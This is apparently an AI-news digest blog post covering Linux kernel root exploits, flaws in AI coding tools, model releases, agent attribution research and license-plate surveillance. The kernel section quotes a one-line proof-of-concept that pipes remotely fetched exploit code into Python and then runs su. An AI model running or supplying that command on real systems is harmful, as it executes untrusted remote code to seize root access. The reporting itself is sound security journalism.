The Great Kernel Backlog Clearing
Published on
Today's AI news: The Great Kernel Backlog Clearing, AI Coding Tools: Trust Deficits Everywhere, Inkling Drops: Thinking Machines' Open-Weight Bet, Context Engineering Grows Up, Who Owns This Agent?, Breaking the CUDA Moat, The Surveillance You Didn't Vote For. 22 sources curated from across the web.
The Great Kernel Backlog Clearing
The Linux kernel is having a very bad summer. Three universal local privilege escalation vulnerabilities have surfaced in rapid succession — Copy Fail, Dirty Frag, and Bad Epoll — each capable of granting root access on essentially every mainstream Linux distribution. The pace is historically unprecedented: bugs of this caliber used to appear once every five to ten years (Dirty Cow in 2016, Dirty Pipe in 2022). Now three have dropped in roughly two months, and the implications for anyone running shared infrastructure — CI runners, container hosts, cloud VMs — are severe. (more: https://copy.fail)
Copy Fail set the tone. Discovered by Xint with AI-assisted auditing, it exploits a logic flaw in the kernel's algif_aead crypto subsystem that has existed since 2017. An unprivileged user can write four controlled bytes into the page cache of any readable file — including setuid binaries — gaining root with a 732-byte Python script that works unmodified across Ubuntu, RHEL, Amazon Linux, and SUSE. No race condition, no offsets, no recompilation. The corruption happens in the page cache, not on disk, so nothing hits the filesystem and no integrity-monitoring tool fires on eviction. The PoC literally fits in a tweet-length command: curl https://copy.fail/exp | python3 && su. Mitigation is straightforward — blacklist the algif_aead module — but the real story is the nine-year window during which this logic bug sat in plain sight.
Dirty Frag arrived weeks later, extending the same page-cache write primitive into two new subsystems: xfrm-ESP (CVE-2026-43284) and RxRPC (CVE-2026-43500). Researcher Hyunwoo Kim chained the two variants to cover each other's blind spots: xfrm-ESP works broadly but requires namespace privileges that Ubuntu's AppArmor may block, while RxRPC needs the rxrpc.ko module that ships by default on Ubuntu but not most other distributions. The combination roots every major distribution tested — Ubuntu 24.04, RHEL 10.1, openSUSE Tumbleweed, Fedora 44, and more — deterministically, with near-100% reliability. The researcher explicitly noted that Copy Fail motivated the work, and the two bugs share the same sink even on systems where the algif_aead blacklist is already applied. (more: https://github.com/v4bel/dirtyfrag)
Then came Bad Epoll (CVE-2026-46242), a use-after-free race condition in the kernel's epoll subsystem — the foundation of virtually all async I/O on Linux. Unlike the page-cache bugs, this one has no kill switch: epoll cannot be disabled or unloaded; it is core kernel plumbing that every network service, browser, and event loop depends on. The race window is only about six instructions wide, yet the exploit achieves 99% reliability on kernelCTF targets through a clever timer-interrupt technique that widens the window. Bad Epoll is also notable for what it says about AI-assisted vulnerability research: Anthropic's Mythos found a different race bug (CVE-2026-43074) in the same ~2,500 lines of epoll code from the same 2023 commit, but missed Bad Epoll. The researcher attributes this to the extremely narrow race window and the fact that KASAN — the kernel's primary memory-error detector — does not trigger during the exploit's vulnerable window, leaving Mythos without the runtime signal it likely relied on for confidence. Perhaps most alarming: Bad Epoll can root Android devices and can be triggered from inside Chrome's renderer sandbox, making it chainable with browser exploits for full kernel code execution. (more: https://github.com/J-jaeyoung/bad-epoll)
A security YouTuber neatly framed the pattern: "We are witnessing the great backlog clearing." These vulnerabilities are not new code — they have sat dormant for three to nine years, protected only by a lack of human bandwidth. AI-assisted auditing tools like Mythos and Xint's operator-prompt pipeline are now systematically working through subsystems that were previously too large or too complex for manual review, and the results are pouring out faster than distributions can patch. For defenders, the actionable takeaway is grim but clear: patch aggressively, assume your container boundaries are weaker than you think, and treat any environment running untrusted code on a shared kernel as already at elevated risk. (more: https://www.youtube.com/watch?v=BxdWlV5LI_4)
AI Coding Tools: Trust Deficits Everywhere
If the kernel bugs represent old debt being called in, the security posture of AI coding tools represents new debt being taken on at speed. Cursor, the AI-assisted IDE with over seven million active users and a reported $60 billion market valuation, has been shipping an unpatched arbitrary code execution vulnerability for more than seven months — and Mindgard, the security firm that found it, has gone full disclosure after exhausting every coordinated channel available. (more: https://mindgard.ai/blog/cursor-0day-when-full-disclosure-becomes-the-only-protection-left)
The bug itself is almost insultingly simple. When Cursor loads a project on Windows, it searches for Git binaries at multiple locations, including the current workspace root. A repository containing a malicious git.exe in the project root will have that binary executed automatically — no clicks, no prompts, no approval dialogs. Mindgard's proof of concept used a renamed Windows Calculator; multiple Calculator windows kept spawning as Cursor repeatedly re-invoked the binary during normal operation. The timeline reads like a case study in vendor non-response: initial disclosure on December 15, 2025; acknowledgment from Cursor's CISO that an automation failure had broken the HackerOne workflow; report initially closed as "Informative and out of scope"; reopened after HackerOne reproduction; then months of silence through 197+ new Cursor releases. Mindgard's question — "What exactly is the security process for?" — is rhetorical but pointed.
Meanwhile, xAI's Grok CLI drew its own trust fire after users discovered it was silently uploading data to Google Cloud. The Reddit thread was unsparing ("Anyone who gave their data to Musk and didn't think this was going to happen is absolutely one of the dumbest people in the modern world"), but the underlying architecture is worth examining: xAI open-sourced the Grok Build codebase, revealing a Rust-based TUI agent that understands codebases, edits files, executes shell commands, and supports headless mode for CI scripting. The THIRD-PARTY-NOTICES file even acknowledges source ports from OpenAI's Codex and SST's OpenCode tool implementations. The data-upload behavior appears to be a design choice rather than a bug, which is arguably worse — it means the telemetry was intentional and undisclosed. (more: https://old.reddit.com/r/OpenAI/comments/1uvlcvt/grok_cli_silently_uploaded_users_data_to_google/) (more: https://github.com/xai-org/grok-build)
The pattern across both stories is the same: AI tools are asking for — and receiving — unprecedented access to source code, credentials, terminals, and workflows, while treating security as a feature to be shipped later. When your IDE auto-executes binaries and your CLI exfiltrates your code, the productivity gains start looking like a very expensive trade.
Inkling Drops: Thinking Machines' Open-Weight Bet
Thinking Machines released Inkling, a 975-billion-parameter Mixture-of-Experts transformer (41B active) trained from scratch on 45 trillion tokens of text, images, audio, and video. It supports up to 1M token context, controllable thinking effort, and arrives alongside a preview of Inkling-Small (276B total, 12B active). The model is available on the company's Tinker platform with open weights on HuggingFace. (more: https://thinkingmachines.ai/news/introducing-inkling/)
The positioning is deliberately understated: Thinking Machines states outright that "Inkling is not the strongest overall model available today, open or closed." Instead, they are pitching it as a customization-first foundation — broad enough to fine-tune across domains, efficient enough to make that fine-tuning economically viable. The architecture follows DeepSeek-V3's MoE blueprint: 256 routed experts (6 active per token), sigmoid routing with auxiliary-loss-free load balancing, and a 5:1 sliding-window-to-global attention ratio. Relative positional embeddings replace RoPE for better long-sequence extrapolation. Audio enters as dMel spectrograms, images as 40×40 pixel patches — no separate encoder.
The controllable thinking effort is the most interesting engineering detail. By varying system messages and per-token costs during RL training (30M+ rollouts), they trained the model to modulate its chain-of-thought depth. The resulting cost-performance curve shows Inkling matching Nemotron 3 Ultra on Terminal Bench 2.1 at roughly one-third the tokens. An emergent side effect: over the course of RL training, the chain of thought became more concise on its own — dropping grammatical overhead while preserving comprehensibility. The Cognition team independently noted the same compression effect while training SWE-1.7.
Separately in the efficiency space, Moebius from Huazhong University demonstrates that architecture-distillation synergy can challenge the scaling law orthodoxy for task-specific work. This 0.22B-parameter image inpainting model (less than 2% of FLUX.1-Fill-Dev's 11.9B) matches or surpasses its 10B-class competitors across six benchmarks while running 15× faster. The core insight — a novel LλMI attention block that condenses spatial context into fixed-size linear matrices, combined with adaptive multi-granularity distillation from their PixelHacker teacher model — earned an ECCV 2026 acceptance and the #1 daily ranking on HuggingFace. (more: https://huggingface.co/thinkingmachines/Inkling) (more: https://github.com/hustvl/Moebius)
Context Engineering Grows Up
The term "context engineering" has gone from insider jargon to the central discipline of production agent work in roughly a year. An Anthropic technical staff member laid out the trajectory at AI DevCon: from simple CLAUDE.md files (unreasonably effective but prone to context bloat) to memory tools (autonomous read/write within sessions) to skills (progressive disclosure that loads detailed instructions only when needed) to the current state of the art — modeling memory as a plain filesystem that agents search with standard tools like bash and grep. The key learnings: Markdown is great; let memories grow large but give agents tools to index and search them; give agents autonomy when writing. (more: https://www.linkedin.com/posts/linasbeliunas_anthropic-engineer-nailed-it-youre-not-ugcPost-7483236579117842432-21M6)
The LinkedIn commentary was sharp. Commenters flagged the obvious risk: if the model hallucinates a fact and writes it into permanent memory, that error becomes truth for all future sessions. Others noted the misleading use of "dreaming" for what is really a summarization prompt run during downtime — no weight updates, no actual learning. These are real engineering concerns that the talk acknowledged indirectly through its emphasis on production guardrails: versioning with rollback capability, hash-based concurrency control (take hash before edit, verify it hasn't changed before commit), and strict permissioning hierarchies that prevent individual agents from corrupting organization-wide context.
A complementary perspective on agent workflows came from a former principal engineer at Meta and Microsoft who ships 40-50 production commits daily using multi-agent sessions. The workflow — plan in a rich visual editor, implement in parallel worktrees, validate through an adversarial self-review pipeline, push as a PR with evidence screenshots — represents the emerging standard for high-throughput agentic development. The key scaling insight: stop reviewing diffs yourself and instead build quality gates that your agents execute, much like an engineering director sets culture and processes rather than personally reviewing every pull request. (more: https://www.youtube.com/watch?v=iQyg-KypKAA)
Daniel Miessler's "AI Antifragile" essay offered the philosophical complement: deep understanding of how things work (non-outsourceable), desire to see the world differently (the hardest to acquire), and capability to act (increasingly delegable to AI). The framework is simple but lands differently in a world where AI skills are simultaneously category one (deep understanding of the tool) and category three (the tool itself). The critical warning: do not delegate the parts where you need deep knowledge, even as you outsource execution. (more: https://danielmiessler.com/blog/becoming-ai-antifragile)
On the fine-tuning side, a blunt LocalLLaMA thread questioned why practitioners keep distilling from summarized or censored chain-of-thought traces — particularly from models like Fable, whose actual reasoning tokens are "genuinely abstract gibberish" (one commenter quoted the System Card's playing-card notation as evidence). The consensus: distillation is not magic, SFT fine-tunes almost always degrade base model quality unless backed by enormous datasets or RL, and most open fine-tunes exist primarily to pad CVs and investor pitches rather than to advance the state of the art. (more: https://old.reddit.com/r/LocalLLaMA/comments/1uuvkw9/why_do_people_keep_finetuning_on/)
Who Owns This Agent?
A Ben-Gurion University research team has formalized what may be the most consequential unsolved problem in AI deployment: agent attribution — linking an observed harmful agent interaction back to the account that deployed it. Their paper, "Who Owns This Agent?", is the first to define the problem rigorously and propose a practical solution. The core insight: AI agents inherit structural anonymity by default. Unlike human actors whose identity leaks through accounts, metadata, and behavioral patterns, an agent sending messages, querying APIs, or placing calls does so through generic interfaces with no obligation to identify its operator. (more: https://arxiv.org/abs/2605.16035v1)
The proposed protocol is canary-based. An authorized authority injects content into the agent's interaction stream — a filename during directory traversal, emotional cues during a scam call, a UUID in a web page. If the agent forwards that content to its vendor-hosted LLM, the canary appears in the vendor's session logs, and a narrow time-window search recovers the originating account. Simple lexical canaries work against non-adversarial operators (misconfigured agents, careless deployments). For adversarial operators who interpose filtering wrappers between the world and the API, the team develops "utility-bearing" canaries — content the agent must preserve to function. Stripping a filename from directory listings or emotional context from conversation targets degrades the agent's own task performance below a usable threshold, creating a formal asymmetry in the defender's favor. The paper evaluates real-world agents and reports reliable, scalable attribution.
The timing is pointed. Recent incidents — state-sponsored espionage via Claude Code, a lone operator combining Claude Code with GPT-4.1 to compromise Mexican government systems — demonstrate that even sophisticated adversaries accept vendor API dependencies. Agent attribution would supply the missing link between platform session logs and legal process.
On the observability side, Agent Flow offers a different lens on the agent visibility problem — a real-time node-graph visualization tool for Claude Code and Codex sessions that makes tool-call chains, branching decisions, and time allocation visible during execution. Built by a game developer debugging agent behavior on CraftMyGame, it auto-detects sessions from both runtimes and streams events via hooks or JSONL tailing. The tool is useful, but the research paper is the one that should keep platform operators up at night. (more: https://github.com/patoles/agent-flow)
Breaking the CUDA Moat
Nvidia's CUDA ecosystem owns approximately 80% of the parallel computing development tools market — a lock-in that Spectral Compute, a London-based startup, is methodically dismantling. Their product, SCALE, is a clean-room re-implementation using CLang and LLVM that functions as a drop-in replacement for NVCC, the Nvidia CUDA compiler. After initially targeting AMD GPUs, Spectral is broadening to third-party AI accelerators and claims a nearly 6× performance advantage on AMD hardware compared to HIPIFY-based conversion. The company entered the Nvidia Inception program in June, positioning itself as neutral infrastructure rather than an adversary. (more: https://www.hpcwire.com/2026/07/09/spectral-compute-aims-to-set-cuda-free-will-it-succeed/)
The competitive landscape for CUDA portability is littered with partial solutions. Intel's SYCLomatic migrates about 90% of code, requiring manual work for the rest. AMD's HIPIFY ignores Parallel Thread Execution (PTX), the assembly language that unlocks deep hardware optimization. ZLUDA operates on compiled binaries as middleware, sacrificing performance. Spectral's claim to superiority rests on taking "the approach that's industry-standard for CPUs, but apply it to GPUs" — treating the GPU as just another compilation target rather than something requiring translation layers. With 30 employees, $6 million in funding, and a run on Frontier (the Oak Ridge exascale supercomputer), the company is small but credible.
On the memory side of the inference stack, High Bandwidth Flash (HBF) is emerging as a potential game-changer for serving large models at scale. IEEE Spectrum reports that Sandisk's first-generation HBF will stack up to 16 NAND flash dies for 512GB per stack and read bandwidth up to 1.6TB/s — far below HBM4E's 3.6TB/s, but at dramatically lower cost and with far greater density. The key insight is that inference workloads are read-heavy: model weights are frozen, so flash's terrible write performance is irrelevant. HBF could house static weights and precomputed KV caches, freeing HBM to serve as a high-speed scratchpad. Standardization is underway through the Open Compute Project, with SK Hynix and Sandisk co-leading the effort. (more: https://spectrum.ieee.org/high-bandwidth-flash)
At the consumer end of the scale, Colibri streaming — originally built to run GLM 5.2 on 25GB — has been ported to support Hy3 on just 10GB of RAM, making frontier-class models accessible on consumer hardware without quantization tradeoffs. The LocalLLaMA community is enthusiastic, with commenters calling for Colibri to become "an alternative to llama.cpp" and noting the potential to extend the technique to models like DeepSeek-v4-Flash. (more: https://old.reddit.com/r/LocalLLaMA/comments/1uv8orn/colibri_streaming_for_hy3_run_hy3_on_10gb_vram/)
The Surveillance You Didn't Vote For
DeFlock, an open-source project mapping automated license plate readers (ALPRs) across the United States, has documented a surveillance infrastructure that most people do not know exists. The numbers are staggering: over 5,000 communities equipped with Flock Safety cameras and competitors, capturing more than 20 billion plate reads per month. A single search can query up to 97,000 cameras across 6,800 networks simultaneously. No warrant required, no judge involved — just a login credential and a plate number. (more: https://deflock.org)
The abuse record is exactly what you would predict from an accountability-free surveillance system. In Milwaukee, an officer tracked a woman he was dating 170 times in two months — and the detective assigned to audit the abuse had himself tracked a different woman 17 times. In Idaho, a sheriff ran his wife's plate over 700 times. In Kansas, a police chief tracked his ex-girlfriend over 200 times. The Institute for Justice has counted at least 21 documented abuse cases since 2024 — and those are only the ones that surfaced through FOIA requests. Several states, including Washington, are now passing legislation that exempts ALPR data from public records requests, effectively sealing the only audit trail that exposed these abuses. DeFlock's HaveIBeenFlocked.com tool lets individuals check whether their plate has been searched, using data from FOIA responses contributed by citizens. (more: https://www.youtube.com/watch?v=a645hfYZtps)
A parallel front in the digital rights space involves the push to mandate "blocking technology" in 3D printers, CNC machines, lathes, and laser cutters sold in the United States. Prosecutors Against Gun Violence, chaired by Manhattan DA Alvin Bragg, sent letters to Bambu Lab, Creality, and FlashForge urging them to equip all machines with technology that checks a database before fabrication to determine if the object being created is a firearm component. New York has already enacted this as law through its budget bill, and the coalition is explicitly pushing for national adoption. The technical implications are significant: the blocking technology would require cloud connectivity, real-time authentication against a government database, and processing capabilities beyond what most desktop machines currently have. Foreign manufacturers — who make the vast majority of consumer 3D printers — have no incentive to fight U.S. constitutional battles, and California's AB 2047 passed its public safety committee despite significant opposition testimony. (more: https://www.youtube.com/watch?v=3ctp06SmlIo)
Sources (22 articles)
- [Editorial] (copy.fail)
- [Editorial] (github.com)
- [Editorial] (github.com)
- [Editorial] (youtube.com)
- Cursor 0day: When Full Disclosure Becomes the Only Protection Left (mindgard.ai)
- grok CLI silently uploaded users data to... google cloud (old.reddit.com)
- [Editorial] (github.com)
- Inkling: Our Open-Weights Model (thinkingmachines.ai)
- [Editorial] (huggingface.co)
- hustvl/Moebius (github.com)
- [Editorial] (linkedin.com)
- [Editorial] (youtube.com)
- [Editorial] (danielmiessler.com)
- Why do people keep fine-tuning on summarized/censored SOTA CoT traces? (old.reddit.com)
- Who Owns This Agent? Tracing AI Agents Back to Their Owners (arxiv.org)
- [Editorial] (github.com)
- Alternative(s) to run CUDA on non-Nvidia hardware (hpcwire.com)
- High-Bandwidth Flash offers efficient storage for model weights (spectrum.ieee.org)
- Colibri streaming for Hy3 (Run Hy3 on 10GB (V)RAM) (old.reddit.com)
- [Editorial] (deflock.org)
- [Editorial] (youtube.com)
- [Editorial] (youtube.com)